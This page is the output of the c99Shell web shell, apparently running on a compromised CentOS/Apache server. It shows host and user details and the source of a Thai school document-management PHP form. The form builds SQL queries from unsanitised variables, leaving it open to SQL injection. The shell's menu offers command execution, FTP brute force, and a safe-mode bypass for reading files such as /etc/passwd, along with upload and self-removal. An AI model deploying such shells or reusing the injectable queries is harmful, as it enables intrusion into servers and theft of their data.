!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/Book_depart/Book_Acc/   drwxr-xr-x
Free 52.37 GB of 127.8 GB (40.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     FrmEditPer.php (7.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();
 if (
session_is_registered("valid_user"))
{
$Username $valid_user;
include(
"../../include/FunctionDB.php");
include(
"../../include/Function.php");
include(
"admin_menu.php");
include(
"../../source/myFunc.php");
 
ConnectDB();
 
$sql ="SELECT * FROM  bookPerson_tb  Where  pcodeId='$pcodeId'";
  
$result mysql_query($sql) or die("Cannot Select").mysql_error();
  
$rs mysql_fetch_array($result);
?>
<script language="javascript" src="js/calendarDateInput2.js"></script>
<script language="JavaScript" type="text/JavaScript">
<!--
  function browse()
{
form1.Imag1.src = form1.Img1.value;
}
<!--
 function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
function chk(c){
if (c.checked){
document.all.Prob1.disabled=false;
document.all.Prob2.disabled=false;
document.all.Prob3.disabled=false;
document.all.Prob4.disabled=false;
}
else{
document.all.Problem.disabled=false;
}
}
</script>
<table width="842" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><br><fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="../menu_teacher.php" >˹éÒËÅÑ¡</a> <img src="../../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="BookByYear.php?Book_code=1">¢éÍÁÙÅ˹ѧÊ×ÍÃÒª¡ÒÃÃѺ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />á¡é䢢éÍÁÙÅ˹ѧÊ×ÍÃѺ-Êè§</font></legend>
            <label><div align="center">
              <form id="form1" name="form1" method="post" action="EditMan.php" enctype="multipart/form-data">
                <p align="left"><font size="2" face="Tahoma"><img src="../../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
                <table width="68%" border="0" align="center" cellpadding="0" cellspacing="1" style="border:1px solid gray">
                  
                  <tr bgcolor="#CCCCFF" >
                    <td height="25" colspan="3" bgcolor="#eeeeee"><div align="center"><font color="#000000" size="4" face="Tahoma"><strong><font color="#FF0000">á¡éä¢</font> ¢éÍÁÙÅ</strong></font></div></td>
                  </tr>
                  
                  <tr bgcolor="#EEEEEE">
                    <td width="26%" height="22" bgcolor="#eeeeee"><div align="center"><font size="2" face="Tahoma">ª×èͼÙéÃѺ - Êè§Ë¹Ñ§Ê×Í</font></div></td>
                    <td width="2%" bgcolor="#eeeeee"><font color="#FF0000" size="4" face="Tahoma"><strong>*</strong></font></td>
                    <td width="72%" bgcolor="#eeeeee"><strong><font color="#003366" size="2" face="Tahoma">
                      <select name="Teacher_code" id="Teacher_code" class="input1">
                        <?php
          $Teacher_code 
$rs[Teacher_code];
           
$strSQL2 "SELECT * FROM personal_tb  Where   Teacher_code='$Teacher_code' ";
           
$result2 mysql_query($strSQL2);
             
$strSQL3 "SELECT * FROM  personal_tb   Where   Permision='2'   Order by Teacher_name";
                 
$result3 mysql_query($strSQL3);
                 while( 
$rs2 mysql_fetch_array($result2))     
                     {
                 echo
"<option value=\"$rs2[Teacher_code]\" ><b>$rs2[Teacher_name]&nbsp;$rs2[Teacher_lastname]</b></option>\n";
                  while( 
$rs3 mysql_fetch_array($result3))     
                         {
                       echo
"<option value=\"$rs3[Teacher_code]\" ><b>$rs3[Teacher_name]&nbsp;$rs3[Teacher_lastname]</b></option>\n";
                  }
                     }        
                    
// CloseDB();
            
?>
                      </select>
                    </font><font color="#003366" size="2" face="Tahoma"> </font></strong></td>
                  </tr>
                  <tr bgcolor="#EEEEEE">
                    <td bgcolor="#eeeeee"><div align="center" class="style3"><font size="2" face="Tahoma">˹èǧҹ /½èÒ </font> </div></td>
                    <td bgcolor="#eeeeee">&nbsp;</td>
                    <td bgcolor="#eeeeee"><strong><font size="2" face="MS Sans Serif, Tahoma, sans-serif">
                      <select name="select" class="input1" id="select">
                        <?php
            $Faculty_code
$rs[Faculty_code];
             
$strSQL1 "SELECT * FROM faculty_tb Where Faculty_code='$Faculty_code' ";
            
$result1 mysql_query($strSQL1);
           
$strSQL2 "SELECT * FROM  faculty_tb Order By Faculty_name ";
            
$result2 mysql_query($strSQL2);
                 while( 
$rs1 mysql_fetch_array($result1))
                {
                echo
"<option value=\"$rs1[Faculty_code]\" ><b>$rs1[Faculty_name]</b></option>\n";
                 while( 
$rs2 mysql_fetch_array($result2))
                    {
               echo
"<option value=\"$rs2[Faculty_code]\" ><b>$rs2[Faculty_name]</b></option>\n";
                 }
                }
            
CloseDB();  
          
?>
                      </select>
                    </font></strong></td>
                  </tr>
                  <tr bgcolor="#EEEEEE">
                    <td bgcolor="#eeeeee"><div align="center"><font size="2" face="Tahoma"><font size="2">µéͧ¡ÒÃá¨é§ºØ¤Åҡ÷ء栤¹</font> </font></div></td>
                    <td bgcolor="#eeeeee"><font color="#FF0000" size="4" face="Tahoma"><strong>*</strong></font></td>
                    <td bgcolor="#eeeeee"><font size="2" face="Tahoma">
                      <input type="radio" name="Statistic" <?php if (!(strcmp("$rs[Statistic]","á¨é§"))){echo "checked";} ?> value="á¨é§" />
                      á¨é§
                      <input type="radio" name="Statistic" <?php if (!(strcmp("$rs[Statistic]","äÁèá¨é§"))){echo "checked";} ?> value="äÁèá¨é§" />
                    äÁèá¨é§<strong><font color="#003366" size="2" face="Tahoma"> </font></strong> </font></td>
                  </tr>
                  <tr bgcolor="#EEEEEE">
                    <td height="22" bgcolor="#eeeeee"><div align="center"><font size="2" face="Tahoma">˹èǧҹ</font></div></td>
                    <td bgcolor="#eeeeee"><div align="center"><font color="#FF0000" size="4" face="Tahoma"><strong>*</strong></font></div></td>
                    <td bgcolor="#eeeeee"><input name="Store_1" type="text" class="input" id="Store_1" value="<? echo $rs[Store_1]?>" size="50" />                    </td>
                  </tr>
                  <tr bordercolor="#99CCFF">
                    <td bgcolor="#eeeeee"><div align="center"><font color="#003366" size="2" face="Tahoma">âËÅ´àÍ¡ÊÒà</font></div></td>
                    <td bgcolor="#eeeeee">&nbsp;</td>
                    <td bgcolor="#eeeeee"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                          <td width="73%"><div align="center"> <font color="#996600" size="2" face="Tahoma"></font>
                                  <input name= "Img1"  type="file"  class="input"  id="Img1" size="20" value=" <? echo $rs[Img1]?>"/>
                          </div></td>
                          <td width="27%"><div align="center"></div></td>
                        </tr>
                    </table></td>
                  </tr>
                  <tr bgcolor="#CCCCFF" >
                    <td height="25" colspan="3" bgcolor="#eeeeee"><div align="center">
                        <input name="pcodeId" type="hidden" id="pcodeId" value="<? echo $rs[pcodeId]?>" />
                        <input type="submit" name="Submit" value="á¡éä¢" class="button" />
                    &nbsp;</div></td>
                  </tr>
                </table>
                <br>
            </form>
              </div>
            </label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ËÁÒÂà˵ؠ:</b> ãªéàÁÒÊì¤ÅÔ¡<br>
        </font></td>
    </tr>
</table>
<?php 
    
}
else
{
      echo
"<meta http-equiv=\"refresh\" content=\"3;URL=FrmLogin.php\">\n";
      echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0067 ]--